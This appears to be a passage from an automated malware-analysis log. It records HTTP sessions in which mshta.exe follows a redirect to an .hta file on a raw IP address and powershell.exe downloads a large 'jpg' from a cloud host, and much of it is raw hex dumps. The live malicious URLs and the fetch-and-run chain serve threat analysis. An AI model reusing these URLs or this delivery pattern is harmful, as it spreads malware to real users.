                                                                        2024-12-12 20:38:35 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                        Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                        2024-12-12 20:38:35 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                        Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                        2024-12-12 20:38:35 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                        Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                        2024-12-12 20:38:35 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                        Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                        2024-12-12 20:38:35 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                        Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                        2024-12-12 20:38:35 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                        Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                        2024-12-12 20:38:35 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                        Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                        2024-12-12 20:38:35 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                        Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                        2024-12-12 20:38:35 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                        Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.2249169172.67.163.1844432692C:\Windows\System32\mshta.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:38:38 UTC429OUTGET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: fr-FR
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                        Host: jktc.pro
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:38:38 UTC1231INHTTP/1.1 302 Found
                                                                        Date: Thu, 12 Dec 2024 20:38:38 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 116
                                                                        Connection: close
                                                                        cross-origin-embedder-policy: require-corp
                                                                        cross-origin-opener-policy: same-origin
                                                                        cross-origin-resource-policy: same-origin
                                                                        x-dns-prefetch-control: off
                                                                        x-frame-options: SAMEORIGIN
                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                        x-download-options: noopen
                                                                        x-content-type-options: nosniff
                                                                        origin-agent-cluster: ?1
                                                                        x-permitted-cross-domain-policies: none
                                                                        referrer-policy: no-referrer
                                                                        x-xss-protection: 0
                                                                        location: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
                                                                        vary: Accept, Accept-Encoding
                                                                        x-do-app-origin: 5a212e0f-46b3-415c-8929-fe4f6fb9f10b
                                                                        Cache-Control: private
                                                                        x-do-orig-status: 302
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tMGEU6W6QVhtfHDPrCLhC4fNBLIlE%2BjSUg5omlU%2FQWXsofFHjtu6Uy5UGUQFfk351GDqbc57ZVksZbaLy8r2TxWw1tcPhFt8yM%2BxH2Xb9f1tlJxwT6waetjDvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f1084eae9d04277-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2024-12-12 20:38:38 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 38 35 26 6d 69 6e 5f 72 74 74 3d 31 35 38 35 26 72 74 74 5f 76 61 72 3d 37 39 32 26 73 65 6e 74 3d 37 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 31 26 73 65 6e 74 5f 62 79 74 65 73 3d 34 31 34 38 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 31 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 35 38 33 35 37 26 63 77 6e 64 3d 31 39 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 33 35 66 33 31 62 32 33 65 34 34 39 35 66 61 38 26 74 73 3d 31 30 32 39 26 78 3d 30 22 0d 0a 0d 0a
                                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1585&rtt_var=792&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4148&recv_bytes=1011&delivery_rate=58357&cwnd=191&unsent_bytes=0&cid=35f31b23e4495fa8&ts=1029&x=0"
                                                                        2024-12-12 20:38:38 UTC116INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 32 33 35 2e 32 39 2f 39 30 2f 77 63 63 2f 67 72 65 61 74 61 74 74 69 74 75 64 65 77 69 74 68 6e 69 63 65 66 65 61 74 72 75 65 77 69 74 68 67 72 65 61 74 6e 69 63 65 63 72 65 61 6d 79 70 75 72 70 6c 65 74 68 69 6e 67 73 67 6f 6f 64 2e 68 74 61
                                                                        Data Ascii: Found. Redirecting to http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.2249172151.101.65.1374431732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:38:52 UTC127OUTGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                        Host: res.cloudinary.com
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:38:52 UTC750INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 2230233
                                                                        Content-Type: image/jpeg
                                                                        Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                        Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                        Date: Thu, 12 Dec 2024 20:38:52 GMT
                                                                        Strict-Transport-Security: max-age=604800
                                                                        Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                        Server-Timing: cld-fastly;dur=4;cpu=3;start=2024-12-12T20:38:52.562Z;desc=hit,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)"
                                                                        Server: Cloudinary
                                                                        Timing-Allow-Origin: *
                                                                        Access-Control-Allow-Origin: *
                                                                        Accept-Ranges: bytes
                                                                        X-Content-Type-Options: nosniff
                                                                        Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                        x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                        2024-12-12 20:38:52 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                        2024-12-12 20:38:52 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                        Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                        2024-12-12 20:38:52 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                        Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                        2024-12-12 20:38:52 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                        Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                        2024-12-12 20:38:52 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                        Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                        2024-12-12 20:38:52 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                        Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                        2024-12-12 20:38:52 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
